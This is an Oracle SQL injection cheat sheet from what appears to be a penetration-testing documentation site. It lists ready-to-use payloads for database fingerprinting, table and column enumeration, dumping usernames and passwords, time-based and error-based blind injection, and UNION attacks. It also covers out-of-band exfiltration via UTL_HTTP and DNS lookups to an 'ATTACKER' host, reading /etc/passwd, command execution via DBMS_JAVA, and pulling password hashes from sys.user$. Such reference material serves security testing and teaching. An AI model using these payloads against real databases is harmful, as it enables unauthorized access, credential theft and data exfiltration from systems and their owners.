> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Cheat Sheet — Oracle

> Oracle SQL injection cheat sheet: syntax, enumeration, file access, and OOB exfiltration payloads.

## Identification

```sql theme={"dark"}
SELECT banner FROM v$version
SELECT version FROM v$instance
-- Comment: -- or /* */
-- String concat: 'a'||'b'
-- Every SELECT needs FROM → use FROM dual
```

***

## Information Gathering

```sql theme={"dark"}
SELECT user FROM dual
SELECT ora_database_name FROM dual
SELECT SYS_CONTEXT('USERENV','DB_NAME') FROM dual
SELECT SYS_CONTEXT('USERENV','HOST') FROM dual
SELECT SYS_CONTEXT('USERENV','IP_ADDRESS') FROM dual
```

***

## Enumerate Tables

```sql theme={"dark"}
SELECT table_name FROM all_tables
SELECT table_name FROM user_tables
SELECT table_name FROM all_tables WHERE owner='SCHEMA'
```

***

## Enumerate Columns

```sql theme={"dark"}
SELECT column_name FROM all_tab_columns WHERE table_name='USERS'
SELECT column_name FROM user_tab_columns WHERE table_name='USERS'
```

<Warning>Oracle table/column names are case-sensitive and typically uppercase.</Warning>

***

## Dump Data

```sql theme={"dark"}
SELECT username||':'||password FROM users
SELECT LISTAGG(username||':'||password, ',') WITHIN GROUP (ORDER BY username) FROM users
```

***

## String Functions

| Function               | Description             |
| ---------------------- | ----------------------- |
| `\|\|`                 | Concatenate             |
| `SUBSTR(str,pos,len)`  | Substring               |
| `LENGTH(str)`          | String length           |
| `ASCII(char)`          | ASCII value             |
| `CHR(n)`               | Char from ASCII         |
| `UPPER(str)`           | Uppercase               |
| `LOWER(str)`           | Lowercase               |
| `REPLACE(str,old,new)` | Replace                 |
| `INSTR(str,sub)`       | Find substring position |
| `TRIM(str)`            | Trim whitespace         |
| `TO_CHAR(n)`           | Number to string        |
| `RAWTOHEX(str)`        | Hex encode              |

***

## Conditional

```sql theme={"dark"}
CASE WHEN condition THEN true_val ELSE false_val END
DECODE(expr, search, result, default)
```

***

## Time Delay

```sql theme={"dark"}
DBMS_PIPE.RECEIVE_MESSAGE('a', 5)          -- 5 sec delay

-- In WHERE clause:
AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)

-- Via heavy query (no privileges needed):
AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3) > 0
```

***

## Error-Based

```sql theme={"dark"}
UTL_INADDR.GET_HOST_ADDRESS((QUERY))
CTXSYS.DRITHSX.SN(1,(QUERY))
```

***

## UNION Specifics

Oracle requires:

* Same number of columns
* Compatible types
* `FROM dual` for dummy values

```sql theme={"dark"}
' UNION SELECT NULL,NULL,NULL FROM dual-- -
' UNION SELECT username,password,NULL FROM users-- -
```

***

## OOB — HTTP

```sql theme={"dark"}
SELECT UTL_HTTP.REQUEST('http://ATTACKER/?d='||(SELECT user FROM dual)) FROM dual
SELECT HTTPURITYPE('http://ATTACKER/?d='||(SELECT user FROM dual)).GETCLOB() FROM dual
```

***

## OOB — DNS

```sql theme={"dark"}
SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual)||'.ATTACKER.com') FROM dual
```

***

## File Read

```sql theme={"dark"}
-- Via UTL_FILE (needs directory object)
CREATE DIRECTORY ext AS '/etc';
SELECT UTL_FILE.FOPEN('EXT','passwd','r') FROM dual;
```

### Java (If Enabled)

```sql theme={"dark"}
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/cat /etc/passwd') FROM dual
```

***

## RCE — Java

```sql theme={"dark"}
-- Requires CREATE PROCEDURE + JAVA privileges
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/id') FROM dual
```

***

## No LIMIT — Use ROWNUM

```sql theme={"dark"}
SELECT * FROM (SELECT username, ROWNUM r FROM users) WHERE r=1      -- First row
SELECT * FROM (SELECT username, ROWNUM r FROM users) WHERE r=2      -- Second row
```

***

## Password Hashes

```sql theme={"dark"}
SELECT name, password FROM sys.user$                    -- DBA only
SELECT username, password FROM dba_users                -- DBA only
```

***

## Stacked Queries

Not supported via standard SQL injection (semicolons don't work in Oracle injection context).

***

## Privileges

```sql theme={"dark"}
SELECT * FROM session_privs
SELECT * FROM user_role_privs
SELECT * FROM dba_sys_privs WHERE grantee='USER'
```

***

## Sources

* [PortSwigger — SQL Injection Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
* [PentestMonkey — Oracle SQL Injection Cheat Sheet](https://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
* [Oracle — SQL Functions](https://docs.oracle.com/en/database/oracle/oracle-database/19/sqlrf/Functions.html)
* [OWASP — SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
* [PayloadsAllTheThings — Oracle Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
